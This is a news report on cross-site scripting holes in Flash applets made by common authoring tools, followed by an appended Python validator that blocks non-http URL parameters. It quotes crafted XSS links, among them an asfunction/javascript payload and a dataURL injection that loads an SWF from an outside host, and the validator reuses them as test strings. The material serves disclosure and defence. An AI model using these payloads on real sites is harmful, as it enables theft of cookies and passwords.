In association with heise online

04 January 2008, 13:55

Details of security holes in Flash applets

More detailed information is now available about the security problems reported at the end of last year, which are caused by cross-site scripting vulnerabilities in Flash applets. Apparently, errors in common Flash authoring tools can be exploited to foist crafted JavaScript code on users and execute it in their browsers. In this way attackers can, for example, read cookies and passwords or carry out actions in the context of the visited site, such as posting blog entries or comments.

It is reported that the tools involved include Adobe Dreamweaver, Adobe Acrobat Connect, formerly Macromedia Breeze, InfoSoft FusionCharts and Techsmith Camtasia. The SWF files generated by these tools are said to be on a great many Web sites. At a guess, several hundred thousand Flash applets could have this problem, a not insignificant percentage of them being large and popular – among them government and online banking Web sites.

The problem is not limited to the tools listed, however: according to the report, these are merely the products in which the error has already been corrected by their manufacturers with an update. Also said to be affected are service providers, such as Autodemo, that develop Flash applications for clients and are evidently using a vulnerable tool to do so.

The root cause, according to the report, is defective ActionScript code that the authoring tools embed in SWF files in order to control certain functions. This code is always identical and is inserted into the SWF file every time it is saved or exported. It can be misused to execute JavaScript passed as an argument in the security context of the visited site, even though that JavaScript did not originate there at all but came from an attacker's site. For this to happen, however, the victim must click a crafted link. A link exploiting the XSS vulnerability in Dreamweaver-generated applets, for example, looks like this:

http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//

A flaw in InfoSoft's FusionCharts even allowed additional SWF files to be loaded from other domains via a link such as the following:

http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//cannings.org/DoKnowEvil.swf%3F.jpg%22%3E

The updated version of Adobe Flash Player released in December prevents attackers from exploiting the error via the asfunction protocol handler, at least in the case of Adobe products. The author of the vulnerability report recommends that webmasters remove the vulnerable Flash applets from their sites and recreate them from scratch with corrected versions of the authoring tools. In addition, user-supplied variables that ActionScript passes to any URL function should be checked more thoroughly. Developers can also test the security of their Flash applications with the tool SWFIntruder.
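The "more thorough check" of URL-type parameters recommended above, as an added example that is not from the article or the report it summarises: a server-side validator that percent-decodes a value an SWF would hand to getURL or loadMovie, rejects non-http(s) schemes such as javascript: and asfunction:, rejects markup characters, and pins absolute URLs to an allowed host. The parameter names, the allowed host and the sample requests (modelled on the two links quoted above, with a placeholder attacker host) are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample request lines, modelled on the crafted links in the article.
SAMPLE_REQUESTS = [
    "/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//",
    "/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//attacker.example/DoKnowEvil.swf%3F.jpg%22%3E",
    "/main.swf?baseurl=/charts/data.xml",
    "/Example.swf?dataURL=https://www.example.com/data/q1.xml",
]

ALLOWED_SCHEMES = {"http", "https"}      # only these may reach a URL function
ALLOWED_HOSTS = {"www.example.com"}      # assumed: the site's own origin
URL_PARAMS = {"baseurl", "dataurl"}      # assumed: parameters the applet treats as URLs

def check_url_param(value: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a value an SWF would pass to getURL/loadMovie."""
    decoded = value
    for _ in range(3):                   # undo double/triple percent-encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    # Drop control characters and whitespace that lenient parsers ignore ("java\tscript:").
    cleaned = re.sub(r"[\x00-\x20]", "", decoded)
    if re.search(r"[<>\"']", cleaned):
        return False, "markup characters after decoding"
    parts = urlsplit(cleaned)
    if parts.scheme == "":
        # Relative reference: allow only a site-rooted path, never protocol-relative "//host".
        if cleaned.startswith("/") and not cleaned.startswith("//"):
            return True, "site-relative path"
        return False, "not a site-relative path"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    if parts.hostname not in ALLOWED_HOSTS:
        return False, f"host {parts.hostname!r} not allowed"
    return True, "absolute URL on allowed host"

def flag_request(request_line: str) -> list[str]:
    """Return the names of URL parameters in a request that fail the check."""
    query = urlsplit(request_line).query
    bad = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in URL_PARAMS and not check_url_param(value)[0]:
            bad.append(name)
    return bad
```

Running flag_request over SAMPLE_REQUESTS flags baseurl in the first request and dataURL in the second, and accepts the last two.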

(mba)

Permalink: http://h-online.com/-735751